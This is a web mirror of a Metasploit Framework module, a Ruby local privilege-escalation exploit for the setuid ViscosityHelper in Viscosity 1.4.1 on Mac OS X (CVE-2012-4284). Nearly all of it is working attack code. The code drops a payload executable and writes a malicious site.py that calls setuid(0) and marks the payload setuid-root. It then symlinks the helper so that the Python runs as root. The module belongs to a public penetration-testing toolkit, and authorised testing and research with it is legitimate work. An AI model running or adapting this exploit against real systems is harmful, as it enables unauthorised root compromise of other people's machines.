Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/osx/local/setuid_viscosity.rb
32688 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Local

7
  Rank = ExcellentRanking

8


9
  include Msf::Post::OSX::Priv

10
  include Msf::Post::File

11
  include Msf::Exploit::EXE

12


13
  def initialize(info = {})

14
    super(

15
      update_info(

16
        info,

17
        {

18
          'Name' => 'Viscosity setuid-set ViscosityHelper Privilege Escalation',

19
          'Description' => %q{

20
            This module exploits a vulnerability in Viscosity 1.4.1 on Mac OS X. The

21
            vulnerability exists in the setuid ViscosityHelper, where an insufficient

22
            validation of path names allows execution of arbitrary python code as root.

23
            This module has been tested successfully on Viscosity 1.4.1 over Mac OS X

24
            10.7.5.

25
          },

26
          'References' => [

27
            [ 'CVE', '2012-4284' ],

28
            [ 'OSVDB', '84709' ],

29
            [ 'EDB', '20485' ],

30
            [ 'URL', 'http://blog.zx2c4.com/791' ]

31
          ],

32
          'License' => MSF_LICENSE,

33
          'Author' => [

34
            'Jason A. Donenfeld', # Vulnerability discovery and original Exploit

35
            'juan vazquez' # Metasploit module

36
          ],

37
          'DisclosureDate' => '2012-08-12',

38
          'Platform' => 'osx',

39
          'SessionTypes' => [ 'shell' ],

40
          'Targets' => [

41
            [ 'Viscosity 1.4.1 / Mac OS X x86', { 'Arch' => ARCH_X86 } ],

42
            [ 'Viscosity 1.4.1 / Mac OS X x64', { 'Arch' => ARCH_X64 } ]

43
          ],

44
          'DefaultOptions' => { 'PrependSetresuid' => true, 'WfsDelay' => 2 },

45
          'DefaultTarget' => 0,

46
          'Notes' => {

47
            'Reliability' => UNKNOWN_RELIABILITY,

48
            'Stability' => UNKNOWN_STABILITY,

49
            'SideEffects' => UNKNOWN_SIDE_EFFECTS

50
          }

51
        }

52
      )

53
    )

54
    register_options [

55
      # These are not OptPath because it's a *remote* path

56
      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),

57
      OptString.new('Viscosity', [ true, 'Path to setuid ViscosityHelper executable', '/Applications/Viscosity.app/Contents/Resources/ViscosityHelper' ])

58
    ]

59
  end

60


61
  def base_dir

62
    datastore['WritableDir'].to_s

63
  end

64


65
  def check

66
    unless file? datastore['Viscosity']

67
      vprint_error 'ViscosityHelper not found'

68
      return CheckCode::Safe

69
    end

70


71
    check = cmd_exec("find  #{datastore['Viscosity']} -type f -user root -perm -4000")

72


73
    unless check.include? 'ViscosityHelper'

74
      return CheckCode::Safe

75
    end

76


77
    CheckCode::Vulnerable

78
  end

79


80
  def clean

81
    file_rm(@link)

82
    file_rm(@python_file)

83
    file_rm("#{@python_file}c")

84
    file_rm(@exe_file)

85
  end

86


87
  def exploit

88
    if is_root?

89
      fail_with Failure::BadConfig, 'Session already has root privileges'

90
    end

91


92
    if check != CheckCode::Vulnerable

93
      fail_with Failure::NotVulnerable, 'Target is not vulnerable'

94
    end

95


96
    unless writable? base_dir

97
      fail_with Failure::BadConfig, "#{base_dir} is not writable"

98
    end

99


100
    exe_name = rand_text_alpha(8)

101
    @exe_file = "#{base_dir}/#{exe_name}"

102
    print_status("Dropping executable #{@exe_file}")

103
    write_file(@exe_file, generate_payload_exe)

104


105
    evil_python = <<~EOF

106
      import os

107
      os.setuid(0)

108
      os.setgid(0)

109
      os.system("chown root #{@exe_file}")

110
      os.system("chmod 6777 #{@exe_file}")

111
      os.execl("#{@exe_file}", "#{exe_name}")

112
    EOF

113


114
    @python_file = "#{base_dir}/site.py"

115
    print_status("Dropping python #{@python_file}...")

116
    write_file(@python_file, evil_python)

117


118
    print_status('Creating symlink...')

119
    link_name = rand_text_alpha(8)

120
    @link = "#{base_dir}/#{link_name}"

121
    cmd_exec "ln -s -f -v #{datastore['Viscosity']} #{@link}"

122


123
    print_status('Running...')

124
    begin

125
      cmd_exec "#{@link}"

126
    rescue StandardError

127
      print_error("Failed. Cleaning files #{@link}, #{@python_file}, #{@python_file}c and #{@exe_file}...")

128
      clean

129
      return

130
    end

131
    print_warning("Remember to clean files: #{@link}, #{@python_file}, #{@python_file}c and #{@exe_file}")

132
  end

133
end

134


135